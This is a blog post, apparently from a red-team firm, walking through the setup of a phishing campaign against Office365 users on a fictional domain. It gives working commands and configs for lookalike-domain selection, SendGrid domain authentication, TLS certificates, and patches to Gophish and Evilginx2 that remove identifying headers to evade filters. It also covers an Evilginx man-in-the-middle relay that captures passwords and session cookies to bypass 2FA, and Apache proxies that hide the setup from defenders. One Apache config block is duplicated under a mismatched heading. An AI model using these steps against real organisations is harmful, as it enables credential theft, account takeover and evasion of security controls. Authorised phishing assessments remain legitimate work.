In the last phishing blog we discussed how modern phishing works on the frontend. Read on to find out how threat actors can easily find and authenticate a suitable domain by modifying both Gophish and Evilginx to evade security controls

In the last phishing blog we discussed how modern phishing works on the frontend. Here we go behind the scenes to dissect how to configure and authenticate a good domain for your phishing campaign using Apache as Reverse Proxy. Excited? You caught the hook, read on!

Get a domain

To trick recipients of phishing emails into clicking, you want a domain name that looks very close to the original. You can manually start pondering on what would be great and not-too-obvious domains that look similar… But that takes precious time. To help find suitable domains, we can use tools such as urlcrazy to generate domain typos and variations close to the origin domain, or search ExpiredDomains.net for a now available, high reputation domain. ExpireDomains is in essence a garbage bin that shows you how much value a discarded domain has… a wonderful resource to the adversaries!

For demo purposes and as reference to our examples, we will use the domain aliceland.lab, a fictional but representative global organization, that is embracing a cloud-inclusive IT infrastructure under Office365 cloud services.

Site Categorization

Website categorization, refers to the process of classifying websites based on their content and places what is a countless number of websites into a distributed number of categories under different umbrellas for marketing, cybersecurity, and brand protection purposes, in order to prevent insider threat risks.

Before The Internet we had imagination, now we have Site Categorization.

Well-known categorization sites are listed below:

• Fortiguard
• Symantec
• Cisco
• Checkpoint
• Palo Alto
• TrendMicro
• Brightcloud
• Lightspeed Systems
• Multirbl
• MXToolBox – Blacklists

Authenticate your Domain

What is domain authentication?

Domain authentication, formerly known as domain whitelabel, shows email providers that SMTP providers (such as SendGrid in this example) has your permission to send emails on your behalf. To give SendGrid permission, we need to point DNS entries from your DNS provider (like GoDaddy, Cloudflare, etc) to SendGrid. By doing that our recipients will no longer see the “via sendgrid.net” message on our phished emails.

Email service providers do not trust messages that have not set up domain authentication because they cannot be sure of the legitimacy of the message. Explicitly stating that it comes from our registered domain increases the reputation with email service providers which makes it much less likely that they will filter the mail and not allow it get to the recipient’s inbox, which increases the deliverability.

Login to your SendGrid account and navigate at Sender Authentication under Settings:

• Click on the “Authenticate Your Domain” under Domain Authentication section.
• Select your Domain provided under DNS host option and specify Yes under the question “Would you also like to brand the links for this domain?“

Enter your domain and expand the Advanced Settings option. From the Advanced Settings checkbox and apply the following values accordingly:

Link Subdomain
Override the link subdomain we create that tells mailbox providers where to find your SPF and DKIM records.

DKIM selector
DKIM signature validates and authorizes your domain name in the eyes of the receiver. The DKIM signature is created using a unique string of characters stored as a public key.

Add the DNS records

DNS records are instructions in authoritative DNS servers which are providing information about a domain including what IP address is associated with that domain and how to handle requests for that domain. These records consist of a series of text files written in what is known as DNS syntax. We will add several types of DNS records, including CNAME, MX and TXT records. In order for the SMPT service to be allowed to send on behalf of our domain, we need to make some changed to our DNS settings.

Go to domain registrar’s site and configure DNS settings to include the generated records.

DMARC is the last step in validating our domain for sending e-mails. Where SPF only checks against the 5321.MailFrom address, DMARC also check the 5322.From address. It also tells the receiving mail systems what to do with mail send from your domain that didn’t pass the SPF and DKIM check.

In the domain management portal create a new DNS(TXT) record with the following values:

Issue the Certificates

Before proceeding to configure both the phishing tools that we will be using – Gophish and Evilginx2, we first need a valid domain certificate. As we all know, the green padlock in your address bar and visiting a HTTPS website makes it ‘secure’… So, let’s clone and install the ACME script in order to request the necessary certificates. Remember, automation is key, and ACME will handle this intricate process of requesting, signing and renewing SSL/TLS certificates for us.

git clone https://github.com/acmesh-official/acme.sh.git

cd ./acme.sh

./acme.sh --install -m no-reply@aliceland.lab

In most cases DNS mode is the preferred method, as it eliminates the need to open port 80/TCP for the ACME request procedure. In order to use the manual DNS mode, we need to obtain a read and write capable API key from our DNS provider. Further info can be found in the link here.

Alternatively, you can run DNS manual mode, as such:

./acme.sh --issue --dns dns_gd -d aliceland.lab -d '*.aliceland.lab'

This will require you to manually add some more DNS records like we did in the previous step. The entire purpose of this step is for ACME to verify that you actually own the domain. In the automated mode it will (through the API of your provider) do this on your behalf, with manual mode… Well, you gotta do some manual work, keep in mind that this has to be repeated when renewing your certificate.

Tools of the trade

Gophish

Gophish is our, and among many others, the weapon of choice. It is an open-source phishing toolkit designed for businesses and penetration testers that has been around for many years. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training. We can either download the binary based on our system from here, or we can build it from source.

Modification setup

There are numerous blogs and articles on how to setup and configure Gophish and the assets. In the following steps we will summarize some of these activities that will help us to launch our phishing campaign properly (i.e. not falling flat on your face and getting caught by spamfilters of internet proxies). Let’s first clone the source code of Gophish repo.

git clone https://github.com/gophish/gophish.git

Then, by navigating to the cloned directory, run the following command to replace the default Gophish headers and servers name with the custom values:

find . -type f -exec sed -i.bak 's/X-Gophish-Contact/X-Contact/g' {} +

find . -type f -exec sed -i.bak 's/X-Gophish-Signature/X-Signature/g' {} +

This will make our message less obvious phishing, as by default they shout GOPHISH which defeats the purpose if you wish to remain stealthy. Then we will move on and modify the ServerName parameter under the /gophish/config/config.go file path as follows:

# From

const ServerName = "gophish"

# To

const ServerName = "IGNORE"

GET your RID

As we are about to configure and prepare our phishing scenario for the Outlook MITM Evilginx template, let’s first list what a legitimate URL request looks like when a user is about to login into his Office365 profile.

Looking closely, we are interesting for the following POST structure request, and more specific for the parameter that holds the current login id.

https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=

In order to reflect the actual Microsoft’s connection configuration, we can modify the RecipientParameter parameter Under /gophish/models/campaign.go file path.

const RecipientParameter = "cliend_id"

HTTP 404

The HTTP 404, 404 not found, 404, 404 error, page not found or file not found error message is a hypertext transfer protocol (HTTP) standard response code, to indicate that the browser was able to communicate with a given server, but the server could not find what was requested. The error may also be used when a server does not wish to disclose whether it has the requested information.

Gophish returns a generic 404 page if a request is to be made under the parent domain. Since this will represent a non-valid request to the Microsoft resources or a failed login attempt, we created the following HTML code page for our scenario. For this purpose, we will replace the phish.go file in our base Gophish repository with this file linked here.

Config JSON

A quick look at the modified config.json file and what it looks like. Observe that we don’t expose the Administrator dashboard interface as this is not an opsec safe technique, but the tricky part here is the phishing server configuration. Since we will use a reverse proxy for all our requests, we have modified Gophish to only listen on localhost and on a different port as Apache will manage port 443/TCP.

Of course we can make the Gophish phishing server not use TLS, it would also work perfectly.

{

        "admin_server": {

                "listen_url": "127.0.0.1:3333",

                "use_tls": true,

                "cert_path": "gophish_admin.crt",

                "key_path": "gophish_admin.key"

        },

        "phish_server": {

                "listen_url": "127.0.0.1:8080",

                "use_tls": true,

                "cert_path": "/root/.acme.sh/aliceland.lab/aliceland.lab.cer",

                "key_path": "/root/.acme.sh/aliceland.lab/aliceland.lab.key"

        },

        "db_name": "sqlite3",

        "db_path": "gophish.db",

        "migrations_prefix": "db/db_",

        "contact_address": "",

        "logging": {

                "filename": "",

                "level": ""

        }

}

Evilginx2

Evilginx is an attack framework for setting up phishing pages. Instead of serving templates of sign-in pages lookalikes, Evilginx becomes a relay between the real website and the phished user. Phished user interacts with the real website, while Evilginx captures all the data being transmitted between the two parties. Evilginx, being the man-in-the-middle, captures not only usernames and passwords, but also captures authentication tokens sent as cookies. Captured authentication tokens allow the attacker to bypass any form of 2FA enabled on user’s account (except for U2F – more about it further below). Clone the evilginx2 GitHub repo using the following command.

git clone https://github.com/kgretzky/evilginx2.git

Modification setup

Following almost the same procedure as we did for the Gophish configuration, avoid getting caught by removing the lines of source code defining the X-Evilginx header and change the default port that Eviligin is listening on.

GET X-Started

Common phishing attacks rely on creating HTML templates which requires time and effort in order to reflect a legit domain page and being responsive. For the current Aliceland scenario, we will use the Outlook template with a few adjustments. So, following what is documented in the Evilginx2 Github repo, we will setup the domain and IP using the following commands:

# Set up your options under config file

config domain aliceland.lab

config ip <REDACTED>

config redirect_url https://office.com

# Set up hostname for phishlet

phishlets hostname outlook aliceland.lab

# Generates the DNS entries

phishlets get-hosts outlook

In order for Evilginx to be able to enable our phishlet profile, we first need to place the certification files in the corresponding phishlet folder and then run the following commands to generate our phishing URL. Αs we want the lure-URL to be as close as possible to the original Microsoft’s URL, the path option needs to be modified.

phishlets enable outlook

lures create outlook

lures edit <ID> path common/oauth2/v2.0

lures get-url <ID>

Apache as a Proxy

Since we will use Apache as a reverse proxy for both Gophish and Evilginx, two different virtual host configuration files need to be created. Explaining a bit our concept:

1. BlueTeam enumerates the base domain URL (aliceland.lab) –> Get redirected to 404 Gophish page and then to the legit Office365 web page.
2. Phished user clicks the Gophish generated URL (office.aliceland.lab) with the recipient parameter  client_id –> Get redirected to Evilginx
3. Phished user clicks the phishing URL generated by Evilginx and send it from Gophish (login.aliceland.lab) –> Get redirected to Evilginx

Gophish Virtual Host

sudo nano /etc/apache2/sites-available/office.aliceland.lab.conf

<VirtualHost *:443>

    ServerAlias office.aliceland.lab aliceland.lab

    SSLEngine on

    SSLProxyEngine On

    SSLCertificateFile /root/.acme.sh/aliceland.lab/aliceland.lab.cer

    SSLCertificateKeyFile /root/.acme.sh/aliceland.lab/aliceland.lab.key

    ProxyPreserveHost On

    ProxyPass "/"  "https://127.0.0.1:8080/"

    ProxyPassReverse "/"  "https://127.0.0.1:8080/"

    ErrorLog ${APACHE_LOG_DIR}/error.log

    CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

Evilginx2 Virtual Host

sudo nano /etc/apache2/sites-available/office.aliceland.lab.conf

<VirtualHost *:443>

    ServerAlias office.aliceland.lab aliceland.lab

    SSLEngine on

    SSLProxyEngine On

    SSLCertificateFile /root/.acme.sh/aliceland.lab/aliceland.lab.cer

    SSLCertificateKeyFile /root/.acme.sh/aliceland.lab/aliceland.lab.key

    ProxyPreserveHost On

    ProxyPass "/"  "https://127.0.0.1:8080/"

    ProxyPassReverse "/"  "https://127.0.0.1:8080/"

    ErrorLog ${APACHE_LOG_DIR}/error.log

    CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

Evilginx2 Virtual Host

sudo nano /etc/apache2/sites-available/login.aliceland.lab.conf

<VirtualHost *:443>

    ServerAlias login.aliceland.lab

    SSLEngine on

    SSLProxyEngine On

    SSLCertificateFile /root/.acme.sh/aliceland.lab/aliceland.lab.cer

    SSLCertificateKeyFile /root/.acme.sh/aliceland.lab/aliceland.lab.key

    ProxyPreserveHost On

    ProxyPass "/"  "https://0.0.0.0:8443/"

    ProxyPassReverse "/"  "https://0.0.0.0:8443/"

    ErrorLog ${APACHE_LOG_DIR}/error.log

    CustomLog ${APACHE_LOG_DIR}/access_login.log "%h "%r" "%{Referer}i" "%{User-Agent}i""

</VirtualHost>

GET Started

Gophish is centered around launching campaigns. This involves sending emails to one or more groups and monitoring for opened emails, clicked links, or submitted credentials. To configure and launch a campaign, click the “Campaigns” entry in the navigation sidebar. We won’t go through how to configure and setup each option under Gophish administrative dashboard, but will focus on how to use the Gophish to send the Evilginx phished link and how to retrieve back to Gophish dashboard the nice and useful stats of our campaign.

To achieve the integration between the statistics from Gophish and the capture sessions from Evilginx, we need to pay attention to the following tag or variables.

• Evilginx URL
• The target’s unique ID of Gophish
• The URL to the tracking handler

The tricky part here comes in the landing page options, where we can either specify the Evilginx URL, but doing so will miss the “Email Opened” statistic as Gophish will replace {{.TrackingURL}} with the landing page option during campaign creation, or following a better approach and modify the HTML code of the email template to include the following line of code at the end:

<img src="https://office.aliceland.lab/common/oauth2/v2.0/track?cliend_id={{.RId}}"/>

Another approach will be to specify under the “Position” option of the target user the URL of our Gopshih server, and instead of hardcoding the URL to call the specific tag id during campaign generation.

By adopting one of the options listed above, it is now time to launch our campaign. By simply following the instructions mentioned, we do as follow:

The URL field is what populates the  {{.URL}} template value and this should point to the Evilginx phishing URL, and for that reason we need to complete it with the generated URL of Evilginx.

Once we click the “Launch Campaign” button, the URL field will be completed with the value client_id, which represent the unique identifier of the target:

https://login.aliceland.lab/common/oauth2/v2.0?cliend_id=XXX

The Gophish code is structured and entirely written in Go language, however, it may take some time to be able to work out where certain functions are defined and located. By manually writing a simple code block to control the Apache logs of both Gophish and Evilginx, we were able to integrate the Evilginx statistics into the Gophish dashboard, and thus have every piece of information in the Gophish dashboard.

Key takeaways

Here we described how to easily find and authenticate a suitable domain by modifying both Gophish and Evilginx, and launching a phishing campaign without losing the ability to simultaneously grab statistics from Gophish dahsboard and session tokens from Evilginx. Different vendor services can be used to send our emails or to gain a higher reputation for our domain, but as this is an POC scenario, use your imagination to accomplish what’s best for your Social Engineering assessments.

References ·

• https://edermi.github.io/post/2021/modding_gophish/
• https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls
• https://sidb.in/posts/phishing-101/